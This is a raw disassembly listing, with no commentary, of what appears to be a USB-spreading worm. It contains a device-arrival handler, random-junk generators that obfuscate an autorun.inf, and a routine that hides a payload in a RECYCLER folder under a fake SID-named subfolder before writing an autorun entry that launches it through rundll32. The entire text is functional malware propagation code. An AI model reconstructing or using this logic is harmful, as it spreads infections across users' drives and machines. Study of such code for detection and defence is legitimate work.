var_3 = byte ptr -3
Dest = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, rand
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AA63D
push edi
mov edi, edx
loc_9AA616: ; CODE XREF: sub_9AA5FC+25�j
; sub_9AA5FC+29�j ...
call esi ; rand
and al, 1Fh
inc al
cmp al, 0Dh
mov [ebp+Source], al
jz short loc_9AA616
cmp al, 0Ah
jz short loc_9AA616
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
mov [ebp+var_3], 0
call strcat
dec edi
pop ecx
pop ecx
jnz short loc_9AA616
pop edi
loc_9AA63D: ; CODE XREF: sub_9AA5FC+15�j
pop esi
leave
retn
sub_9AA5FC endp
; =============== S U B R O U T I N E =======================================
sub_9AA640 proc near ; CODE XREF: sub_9AA6DB:loc_9AA75E�p
; sub_9AA7AA+4E�p ...
call rand
push 3
cdq
pop ecx
idiv ecx
sub edx, 0
jz short loc_9AA665
dec edx
jz short loc_9AA65E
dec edx
jnz short locret_9AA672
push offset asc_9A4230 ; "\n"
jmp short loc_9AA66A
; ---------------------------------------------------------------------------
loc_9AA65E: ; CODE XREF: sub_9AA640+12�j
push offset asc_9A422C ; "\r"
jmp short loc_9AA66A
; ---------------------------------------------------------------------------
loc_9AA665: ; CODE XREF: sub_9AA640+F�j
push offset asc_9A4228 ; "\r\n"
loc_9AA66A: ; CODE XREF: sub_9AA640+1C�j
; sub_9AA640+23�j
push esi ; Dest
call strcat
pop ecx
pop ecx
locret_9AA672: ; CODE XREF: sub_9AA640+15�j
retn
sub_9AA640 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA673(char *Dest, char)
sub_9AA673 proc near ; CODE XREF: sub_9AA6DB+72�p
; sub_9AA7AA+20�p ...
Source = byte ptr -4
var_3 = byte ptr -3
Dest = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, rand
call esi ; rand
push 19h
cdq
pop ecx
idiv ecx
inc edx
jz short loc_9AA6D8
push edi
mov edi, edx
loc_9AA68C: ; CODE XREF: sub_9AA673+62�j
cmp [ebp+arg_4], 0
jz short loc_9AA6AA
call esi ; rand
test al, 1
jnz short loc_9AA6AA
call esi ; rand
cdq
mov ecx, 80h
idiv ecx
add dl, 80h
mov [ebp+Source], dl
jmp short loc_9AA6C2
; ---------------------------------------------------------------------------
loc_9AA6AA: ; CODE XREF: sub_9AA673+1D�j
; sub_9AA673+23�j
call esi ; rand
cdq
push 1Ah
pop ecx
idiv ecx
add dl, 41h
mov [ebp+Source], dl
call esi ; rand
test al, 1
jz short loc_9AA6C2
or [ebp+Source], 20h
loc_9AA6C2: ; CODE XREF: sub_9AA673+35�j
; sub_9AA673+49�j
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
mov [ebp+var_3], 0
call strcat
dec edi
pop ecx
pop ecx
jnz short loc_9AA68C
pop edi
loc_9AA6D8: ; CODE XREF: sub_9AA673+14�j
pop esi
leave
retn
sub_9AA673 endp
; =============== S U B R O U T I N E =======================================
sub_9AA6DB proc near ; CODE XREF: sub_9AA7AA+55�p
; sub_9AA7AA+A5�p ...
push esi
push edi
mov edi, rand
mov esi, eax
call edi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AA768
push ebx
push ebp
mov ebp, edx
loc_9AA6F5: ; CODE XREF: sub_9AA6DB+89�j
call edi ; rand
push 3
cdq
pop ecx
idiv ecx
sub edx, 0
jz short loc_9AA728
dec edx
jz short loc_9AA757
dec edx
jnz short loc_9AA763
call edi ; rand
push 1Eh
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AA75E
mov ebx, edx
loc_9AA716: ; CODE XREF: sub_9AA6DB+49�j
push offset asc_9A4224 ; " "
push esi ; Dest
call strcat
dec ebx
pop ecx
pop ecx
jnz short loc_9AA716
jmp short loc_9AA75E
; ---------------------------------------------------------------------------
loc_9AA728: ; CODE XREF: sub_9AA6DB+25�j
push offset asc_9A4234 ; ";"
push esi ; Dest
call strcat
push esi ; Dest
call sub_9AA5FC
add esp, 0Ch
call edi ; rand
push 4
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AA757
mov ebx, edx
loc_9AA74A: ; CODE XREF: sub_9AA6DB+7A�j
push 1 ; char
push esi ; Dest
call sub_9AA673
dec ebx
pop ecx
pop ecx
jnz short loc_9AA74A
loc_9AA757: ; CODE XREF: sub_9AA6DB+28�j
; sub_9AA6DB+6B�j
push esi ; Dest
call sub_9AA5FC
pop ecx
loc_9AA75E: ; CODE XREF: sub_9AA6DB+37�j
; sub_9AA6DB+4B�j
call sub_9AA640
loc_9AA763: ; CODE XREF: sub_9AA6DB+2B�j
dec ebp
jnz short loc_9AA6F5
pop ebp
pop ebx
loc_9AA768: ; CODE XREF: sub_9AA6DB+14�j
pop edi
pop esi
retn
sub_9AA6DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA76B(char *Dest)
sub_9AA76B proc near ; CODE XREF: sub_9AA85A+85�p
; sub_9AA85A+149�p ...
Source = byte ptr -4
var_3 = byte ptr -3
Dest = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
jmp short loc_9AA7A2
; ---------------------------------------------------------------------------
loc_9AA774: ; CODE XREF: sub_9AA76B+3A�j
mov al, [esi]
cmp al, 61h
mov [ebp+Source], al
mov [ebp+var_3], 0
jl short loc_9AA793
cmp al, 7Ah
jg short loc_9AA793
call rand
test al, 1
jz short loc_9AA793
and [ebp+Source], 0DFh
loc_9AA793: ; CODE XREF: sub_9AA76B+14�j
; sub_9AA76B+18�j ...
lea eax, [ebp+Source]
push eax ; Source
push [ebp+Dest] ; Dest
call strcat
pop ecx
pop ecx
inc esi
loc_9AA7A2: ; CODE XREF: sub_9AA76B+7�j
cmp byte ptr [esi], 0
jnz short loc_9AA774
pop esi
leave
retn
sub_9AA76B endp
; =============== S U B R O U T I N E =======================================
sub_9AA7AA proc near ; CODE XREF: sub_9AA85A+5E�p
; sub_9AA85A+239�p
var_C = dword ptr -0Ch
push esi
mov esi, eax
push edi
push esi ; Dest
call sub_9AA5FC
mov [esp+0Ch+var_C], offset asc_9A4240 ; "["
push esi ; Dest
call strcat
push esi ; Dest
call sub_9AA5FC
push 0 ; char
push esi ; Dest
call sub_9AA673
mov edi, rand
add esp, 14h
call edi ; rand
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AA7F1
push offset asc_9A423C ; "]"
push esi ; Dest
call strcat
pop ecx
pop ecx
loc_9AA7F1: ; CODE XREF: sub_9AA7AA+38�j
push esi ; Dest
call sub_9AA5FC
pop ecx
call sub_9AA640
mov eax, esi
call sub_9AA6DB
call edi ; rand
push 14h
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9AA857
mov edi, edx
loc_9AA812: ; CODE XREF: sub_9AA7AA+AB�j
push esi ; Dest
call sub_9AA5FC
push 0 ; char
push esi ; Dest
call sub_9AA673
push esi ; Dest
call sub_9AA5FC
push offset asc_9A4238 ; "="
push esi ; Dest
call strcat
push esi ; Dest
call sub_9AA5FC
push 0 ; char
push esi ; Dest
call sub_9AA673
push esi ; Dest
call sub_9AA5FC
add esp, 28h
call sub_9AA640
mov eax, esi
call sub_9AA6DB
dec edi
jnz short loc_9AA812
loc_9AA857: ; CODE XREF: sub_9AA7AA+64�j
pop edi
pop esi
retn
sub_9AA7AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA85A(char *Dest, int, char *Source, int)
sub_9AA85A proc near ; CODE XREF: sub_9AAAA0+55�p
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Memory = dword ptr -0Ch
Str1 = dword ptr -8
var_4 = dword ptr -4
Dest = dword ptr 8
arg_4 = dword ptr 0Ch
Source = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
mov eax, offset aShellexecute ; "shellexecute"
push esi
mov esi, [ebp+Dest]
push edi
mov ecx, offset aOpen ; "open"
mov edx, offset aAction ; "action"
mov [ebp+var_24], eax
mov edi, offset aIcon ; "icon"
mov [ebp+var_38], eax
mov [ebp+var_14], eax
mov eax, esi
mov [ebp+var_28], ecx
mov [ebp+var_20], edi
mov [ebp+var_1C], edx
mov [ebp+var_34], edi
mov [ebp+var_30], edx
mov [ebp+var_2C], offset aUseautoplay1 ; "useautoplay=1"
mov [ebp+var_18], ecx
call sub_9AA6DB
mov edi, rand
call edi ; rand
push 14h
cdq
pop ecx
idiv ecx
inc edx
jz short loc_9AA8C0
mov ebx, edx
loc_9AA8B6: ; CODE XREF: sub_9AA85A+64�j
mov eax, esi
call sub_9AA7AA
dec ebx
jnz short loc_9AA8B6
loc_9AA8C0: ; CODE XREF: sub_9AA85A+58�j
push esi ; Dest
call sub_9AA5FC
mov [esp+48h+var_48], offset asc_9A4240 ; "["
push esi ; Dest
call strcat
push esi ; Dest
call sub_9AA5FC
push esi ; Dest
mov eax, offset aAutorun ; "autorun"
call sub_9AA76B
add esp, 10h
call edi ; rand
test al, 1
jz short loc_9AA8FA
push offset asc_9A423C ; "]"
push esi ; Dest
call strcat
pop ecx
pop ecx
loc_9AA8FA: ; CODE XREF: sub_9AA85A+91�j
push esi ; Dest
call sub_9AA5FC
pop ecx
call sub_9AA640
cmp [ebp+arg_C], 5
jnz short loc_9AA918
lea ebx, [ebp+var_28]
loc_9AA90F: ; CODE XREF: sub_9AA85A+C9�j
mov [ebp+arg_C], 4
jmp short loc_9AA92B
; ---------------------------------------------------------------------------
loc_9AA918: ; CODE XREF: sub_9AA85A+B0�j
push 2
pop eax
cmp [ebp+arg_C], eax
jnz short loc_9AA925
lea ebx, [ebp+var_38]
jmp short loc_9AA90F
; ---------------------------------------------------------------------------
loc_9AA925: ; CODE XREF: sub_9AA85A+C4�j
lea ebx, [ebp+var_18]
mov [ebp+arg_C], eax
loc_9AA92B: ; CODE XREF: sub_9AA85A+BC�j
mov eax, [ebp+arg_C]
test eax, eax
jle short loc_9AA95B
mov [ebp+var_4], eax
loc_9AA935: ; CODE XREF: sub_9AA85A+FC�j
call edi ; rand
cdq
idiv [ebp+arg_C]
mov esi, edx
call edi ; rand
cdq
idiv [ebp+arg_C]
dec [ebp+var_4]
lea eax, [ebx+esi*4]
mov ecx, edx
mov edx, [eax]
lea ecx, [ebx+ecx*4]
mov esi, [ecx]
mov [eax], esi
mov [ecx], edx
jnz short loc_9AA935
mov esi, [ebp+Dest]
loc_9AA95B: ; CODE XREF: sub_9AA85A+D6�j
mov eax, esi
call sub_9AA6DB
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
jle loc_9AAA7D
loc_9AA970: ; CODE XREF: sub_9AA85A+21D�j
mov eax, [ebp+var_4]
mov eax, [ebx+eax*4]
push eax ; Src
mov [ebp+Str1], eax
call _strdup
push 3Dh ; Val
push eax ; Str
mov [ebp+Memory], eax
call strchr
add esp, 0Ch
test eax, eax
mov [ebp+var_10], eax
jz short loc_9AA999
mov byte ptr [eax], 0
loc_9AA999: ; CODE XREF: sub_9AA85A+13A�j
push esi ; Dest
call sub_9AA5FC
mov eax, [ebp+Memory]
push esi ; Dest
call sub_9AA76B
push esi ; Dest
call sub_9AA5FC
push offset asc_9A4238 ; "="
push esi ; Dest
call strcat
push esi ; Dest
call sub_9AA5FC
mov eax, [ebp+var_10]
add esp, 18h
test eax, eax
jz short loc_9AA9D3
inc eax
push esi ; Dest
call sub_9AA76B
loc_9AA9D0: ; CODE XREF: sub_9AA85A+1DA�j
pop ecx
jmp short loc_9AAA51
; ---------------------------------------------------------------------------
loc_9AA9D3: ; CODE XREF: sub_9AA85A+16D�j
push offset aIcon ; "icon"
push [ebp+Str1] ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9AAA15
call edi ; rand
test al, 1
push esi ; Dest
mov eax, offset aSystemroot ; "%systemroot%"
jnz short loc_9AA9F7
mov eax, offset aWindir ; "%windir%"
loc_9AA9F7: ; CODE XREF: sub_9AA85A+196�j
call sub_9AA76B
pop ecx
push esi ; Dest
mov eax, offset aSystem32Shell3 ; "\\system32\\shell32.dll"
call sub_9AA76B
push esi ; Dest
call sub_9AA5D4
push offset a4_0 ; ",4"
jmp short loc_9AAA48
; ---------------------------------------------------------------------------
loc_9AAA15: ; CODE XREF: sub_9AA85A+18A�j
push offset aAction ; "action"
push [ebp+Str1] ; Str1
call strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9AAA36
push offset Buffer ; Source
push esi ; Dest
call strcat
pop ecx
jmp short loc_9AA9D0
; ---------------------------------------------------------------------------
loc_9AAA36: ; CODE XREF: sub_9AA85A+1CC�j
mov eax, [ebp+arg_4]
push esi ; Dest
call sub_9AA76B
push esi ; Dest
call sub_9AA5D4
push [ebp+Source] ; Source
loc_9AAA48: ; CODE XREF: sub_9AA85A+1B9�j
push esi ; Dest
call strcat
add esp, 10h
loc_9AAA51: ; CODE XREF: sub_9AA85A+177�j
push esi ; Dest
call sub_9AA5D4
call sub_9AA640
mov eax, esi
call sub_9AA6DB
push [ebp+Memory] ; Memory
call free
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_C]
pop ecx
pop ecx
jl loc_9AA970
loc_9AAA7D: ; CODE XREF: sub_9AA85A+110�j
mov eax, esi
call sub_9AA6DB
call edi ; rand
push 14h
cdq
pop ecx
idiv ecx
inc edx
jz short loc_9AAA9B
mov edi, edx
loc_9AAA91: ; CODE XREF: sub_9AA85A+23F�j
mov eax, esi
call sub_9AA7AA
dec edi
jnz short loc_9AAA91
loc_9AAA9B: ; CODE XREF: sub_9AA85A+233�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AA85A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AAAA0(LPCSTR lpFileName, char *Source, int)
sub_9AAAA0 proc near ; CODE XREF: sub_9AABA4+401�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpFileName = dword ptr 8
Source = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset stru_9A42C8
call __SEH_prolog
xor esi, esi
mov [ebp+var_1C], esi
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], esi
push 40000h ; dwBytes
push 40h ; uFlags
mov edi, GlobalAlloc
call edi ; GlobalAlloc
mov ebx, eax
mov [ebp+var_1C], ebx
test ebx, ebx
jz loc_9AAB71
call rand
cdq
push 2
pop ecx
idiv ecx
test edx, edx
mov eax, offset aRundll32 ; "rundll32"
jnz short loc_9AAAED
mov eax, offset Srch
loc_9AAAED: ; CODE XREF: sub_9AAAA0+46�j
push [ebp+arg_8] ; int
push [ebp+Source] ; Source
push eax ; int
push ebx ; Dest
call sub_9AA85A
push ebx ; Str
call strlen
add esp, 14h
lea eax, [eax+eax+4]
push eax ; dwBytes
push 40h ; uFlags
call edi ; GlobalAlloc
mov esi, eax
mov [ebp+var_20], esi
test esi, esi
jz short loc_9AAB71
mov word ptr [esi], 0FEFFh
push ebx ; Str
call strlen
pop ecx
inc eax
push eax ; cchWideChar
lea eax, [esi+2]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push ebx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call MultiByteToWideChar
test eax, eax
jz short loc_9AAB71
push 1F01FFh ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AC163
pop ecx
pop ecx
push [ebp+lpFileName] ; lpFileName
push esi ; Str
call wcslen
pop ecx
shl eax, 1
push eax ; nNumberOfBytesToWrite
push esi ; lpBuffer
call sub_9AB7F5
add esp, 0Ch
test eax, eax
jz short loc_9AAB71
push 120089h ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AC163
pop ecx
pop ecx
loc_9AAB71: ; CODE XREF: sub_9AAAA0+2D�j
; sub_9AAAA0+73�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AAB88
; ---------------------------------------------------------------------------
loc_9AAB77: ; DATA XREF: .text:stru_9A42C8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AAB7B: ; DATA XREF: .text:stru_9A42C8�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
mov esi, [ebp+var_20]
loc_9AAB88: ; CODE XREF: sub_9AAAA0+D5�j
test esi, esi
jz short loc_9AAB93
push esi ; hMem
call GlobalFree
loc_9AAB93: ; CODE XREF: sub_9AAAA0+EA�j
test ebx, ebx
jz short loc_9AAB9E
push ebx ; hMem
call GlobalFree
loc_9AAB9E: ; CODE XREF: sub_9AAAA0+F5�j
call __SEH_epilog
retn
sub_9AAAA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AABA4(LPVOID)
sub_9AABA4 proc near ; CODE XREF: sub_9AB156+7F�p
; DATA XREF: sub_9AAFD8+8B�o
Source = byte ptr -7B0h
var_6AD = byte ptr -6ADh
FindFileData = _WIN32_FIND_DATAA ptr -6ACh
var_56C = byte ptr -56Ch
var_469 = byte ptr -469h
Dest = byte ptr -468h
var_365 = byte ptr -365h
PathName = byte ptr -364h
var_261 = byte ptr -261h
var_260 = byte ptr -260h
var_15D = byte ptr -15Dh
FileName = byte ptr -15Ch
var_59 = byte ptr -59h
var_58 = byte ptr -58h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_30 = dword ptr -30h
FileSystemFlags = dword ptr -2Ch
Str1 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
hMem = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 7A0h
push offset stru_9A4350
call __SEH_prolog
mov edi, [ebp+arg_0]
mov [ebp+hMem], edi
xor esi, esi
mov [ebp+ms_exc.disabled], esi
mov [ebp+var_40], esi
mov [ebp+FileSystemFlags], esi
call sub_9AC33A
push esi ; nFileSystemNameSize
push esi ; lpFileSystemNameBuffer
lea eax, [ebp+FileSystemFlags]
push eax ; lpFileSystemFlags
push esi ; lpMaximumComponentLength
push esi ; lpVolumeSerialNumber
push esi ; nVolumeNameSize
push esi ; lpVolumeNameBuffer
push dword ptr [edi+4] ; lpRootPathName
call GetVolumeInformationA
test eax, eax
jz loc_9AAFB6
test byte ptr [ebp+FileSystemFlags+2], 8
jnz loc_9AAFB6
push 80012F5h ; Seed
call srand
mov esi, rand
call esi ; rand
cdq
push 4
pop ecx
idiv ecx
add edx, 5
push edx
lea eax, [ebp+var_3C]
push eax
call sub_9AB647
add esp, 0Ch
loc_9AAC17: ; CODE XREF: sub_9AABA4+99�j
call esi ; rand
cdq
push 3
pop ecx
idiv ecx
inc edx
push edx
lea eax, [ebp+Str1]
push eax
call sub_9AB647
push offset aDll_0 ; "dll"
lea eax, [ebp+Str1]
push eax ; Str1
call strcmp
add esp, 10h
test eax, eax
jz short loc_9AAC17
call esi ; rand
cdq
push 10h
pop ecx
idiv ecx
test edx, edx
jz loc_9AAD03
mov edi, 104h
push edi ; Count
push offset aRecycler ; "RECYCLER"
lea eax, [ebp+Dest]
push eax ; Dest
call strncpy
add esp, 0Ch
mov [ebp+var_365], 0
call esi ; rand
cdq
mov ebx, 2710h
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
push 64h
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
push 64h
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
idiv ebx
push edx
call esi ; rand
cdq
push 64h
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
push offset aSDDDDDDDDDDDDD ; "S-%d-%d-%d-%d%d%d-%d%d%d-%d%d%d-%d"
push edi ; Count
lea eax, [ebp+var_260]
push eax ; Dest
mov ebx, _snprintf
call ebx ; _snprintf
add esp, 40h
mov [ebp+var_15D], 0
jmp short loc_9AAD41
; ---------------------------------------------------------------------------
loc_9AAD03: ; CODE XREF: sub_9AABA4+A5�j
call esi ; rand
cdq
push 14h
pop ecx
idiv ecx
add edx, 5
push edx
lea eax, [ebp+Dest]
push eax
call sub_9AB647
call esi ; rand
cdq
push 1Eh
pop ecx
idiv ecx
add edx, 0Ah
push edx
lea eax, [ebp+var_260]
push eax
call sub_9AB647
add esp, 10h
mov edi, 104h
mov ebx, _snprintf
loc_9AAD41: ; CODE XREF: sub_9AABA4+15D�j
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+Dest]
push eax
mov eax, [ebp+hMem]
push dword ptr [eax+4]
push offset aSSSS_S ; "%s%s\\%s\\%s.%s"
push edi ; Count
lea eax, [ebp+FileName]
push eax ; Dest
call ebx ; _snprintf
add esp, 20h
mov [ebp+var_59], 0
mov [ebp+var_20], 1
and [ebp+var_30], 0
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea eax, [ebp+FileName]
push eax ; lpFileName
call FindFirstFileA
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jz short loc_9AADA1
push eax ; hFindFile
call FindClose
loc_9AADA1: ; CODE XREF: sub_9AABA4+1F4�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_9AADB4
cmp [ebp+FindFileData.nFileSizeLow], 0
jnz loc_9AAED9
loc_9AADB4: ; CODE XREF: sub_9AABA4+201�j
lea eax, [ebp+Dest]
push eax
mov eax, [ebp+hMem]
push dword ptr [eax+4]
push offset aSS_0 ; "%s%s"
push edi ; Count
lea eax, [ebp+PathName]
push eax ; Dest
call ebx ; _snprintf
mov [ebp+var_261], 0
push 1F01FFh ; int
lea eax, [ebp+PathName]
push eax ; lpFileName
call sub_9AC163
add esp, 1Ch
push 0 ; lpSecurityAttributes
lea eax, [ebp+PathName]
push eax ; lpPathName
call CreateDirectoryA
mov [ebp+var_20], eax
test eax, eax
jnz short loc_9AAE12
call GetLastError
cmp eax, 0B7h
jnz loc_9AAED9
loc_9AAE12: ; CODE XREF: sub_9AABA4+25B�j
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+PathName]
push eax
push offset aSS_1 ; "%s\\%s"
push edi ; Count
lea eax, [ebp+var_56C]
push eax ; Dest
call ebx ; _snprintf
mov [ebp+var_469], 0
push 1F01FFh ; int
lea eax, [ebp+var_56C]
push eax ; lpFileName
call sub_9AC163
add esp, 1Ch
push 0 ; lpSecurityAttributes
lea eax, [ebp+var_56C]
push eax ; lpPathName
call CreateDirectoryA
mov [ebp+var_20], eax
test eax, eax
jnz short loc_9AAE6D
call GetLastError
cmp eax, 0B7h
jnz short loc_9AAEC9
loc_9AAE6D: ; CODE XREF: sub_9AABA4+2BA�j
push 1F01FFh ; int
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_9AC163
lea eax, [ebp+FileName]
push eax ; lpFileName
push ds:nNumberOfBytesToWrite ; nNumberOfBytesToWrite
push ds:lpBuffer ; lpBuffer
call sub_9AB7F5
add esp, 14h
mov [ebp+var_20], eax
test eax, eax
jz short loc_9AAEC9
push 1200A9h ; int
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_9AC163
push 21h ; int
lea eax, [ebp+var_56C]
push eax ; lpFileName
call sub_9AC163
add esp, 10h
mov [ebp+var_30], 1
loc_9AAEC9: ; CODE XREF: sub_9AABA4+2C7�j
; sub_9AABA4+2FA�j
push 0 ; int
lea eax, [ebp+PathName]
push eax ; lpFileName
call sub_9AC132
pop ecx
pop ecx
loc_9AAED9: ; CODE XREF: sub_9AABA4+20A�j
; sub_9AABA4+268�j
cmp [ebp+var_20], 0
jz loc_9AAFB6
mov eax, [ebp+hMem]
push dword ptr [eax+4]
push offset aSautorun_inf ; "%sautorun.inf"
push edi ; Count
lea eax, [ebp+FileName]
push eax ; Dest
call ebx ; _snprintf
add esp, 10h
mov [ebp+var_59], 0
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea eax, [ebp+FileName]
push eax ; lpFileName
call FindFirstFileA
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jz short loc_9AAF22
push eax ; hFindFile
call FindClose
loc_9AAF22: ; CODE XREF: sub_9AABA4+375�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_9AAF3A
cmp [ebp+FindFileData.nFileSizeLow], 1000h
jb short loc_9AAF3A
cmp [ebp+var_30], 0
jz short loc_9AAFB6
loc_9AAF3A: ; CODE XREF: sub_9AABA4+382�j
; sub_9AABA4+38E�j ...
call esi ; rand
cdq
push 14h
pop ecx
idiv ecx
inc edx
push edx
lea eax, [ebp+var_58]
push eax
call sub_9AB647
push offset aMarnwkcw ; "marnwkcw"
lea eax, [ebp+var_58]
push eax ; Str1
call strcmp
add esp, 10h
test eax, eax
jz short loc_9AAF3A
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+Dest]
push eax
push offset a_SSS_SS ; ".\\%s\\%s\\%s.%s,%s"
push edi ; Count
lea eax, [ebp+Source]
push eax ; Dest
call ebx ; _snprintf
mov [ebp+var_6AD], 0
mov eax, [ebp+hMem]
push dword ptr [eax] ; int
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_9AAAA0
add esp, 2Ch
jmp short loc_9AAFB6
; ---------------------------------------------------------------------------
loc_9AAFAF: ; DATA XREF: .text:stru_9A4350�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AAFB3: ; DATA XREF: .text:stru_9A4350�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AAFB6: ; CODE XREF: sub_9AABA4+3A�j
; sub_9AABA4+44�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+hMem]
push dword ptr [esi+4] ; Memory
call free
pop ecx
push esi ; hMem
call GlobalFree
xor eax, eax
call __SEH_epilog
retn 4
sub_9AABA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AAFD8(const CHAR Src)
sub_9AAFD8 proc near ; CODE XREF: sub_9AB07D+12�p
ThreadId = dword ptr -4
Src = byte ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+Src], 8000h
jnz locret_9AB07B
cmp dword ptr [eax+4], 2
jnz locret_9AB07B
mov ecx, [eax+0Ch]
xor al, al
loc_9AAFF8: ; CODE XREF: sub_9AAFD8+2B�j
test cl, 1
jnz short loc_9AB005
shr ecx, 1
inc al
cmp al, 1Ah
jl short loc_9AAFF8
loc_9AB005: ; CODE XREF: sub_9AAFD8+23�j
cmp al, 1
jle short locret_9AB07B
add al, 41h
mov [ebp+Src], al
push edi
lea eax, [ebp+Src]
push eax ; lpRootPathName
mov byte ptr [ebp+9], 3Ah
mov byte ptr [ebp+0Ah], 5Ch
mov byte ptr [ebp+0Bh], 0
call GetDriveTypeA
mov edi, eax
cmp edi, 2
jz short loc_9AB03B
cmp edi, 3
jz short loc_9AB03B
cmp edi, 4
jz short loc_9AB03B
cmp edi, 5
jnz short loc_9AB07A
loc_9AB03B: ; CODE XREF: sub_9AAFD8+52�j
; sub_9AAFD8+57�j ...
push esi
push 8 ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
test esi, esi
jz short loc_9AB079
lea eax, [ebp+Src]
push eax ; Src
mov [esi], edi
call _strdup
pop ecx
mov [esi+4], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push esi ; lpParameter
push offset sub_9AABA4 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
loc_9AB079: ; CODE XREF: sub_9AAFD8+72�j
pop esi
loc_9AB07A: ; CODE XREF: sub_9AAFD8+61�j
pop edi
locret_9AB07B: ; CODE XREF: sub_9AAFD8+B�j
; sub_9AAFD8+15�j ...
leave
retn
sub_9AAFD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AB07D(int, int, CHAR Src, int)
sub_9AB07D proc near ; DATA XREF: sub_9AB0A3+1E�o
arg_4 = dword ptr 0Ch
Src = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 219h
jnz short loc_9AB09C
push dword ptr [ebp+Src] ; Src
mov eax, [ebp+arg_C]
call sub_9AAFD8
xor eax, eax
pop ecx
inc eax
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_9AB09C: ; CODE XREF: sub_9AB07D+A�j
pop ebp
jmp DefWindowProcA
sub_9AB07D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
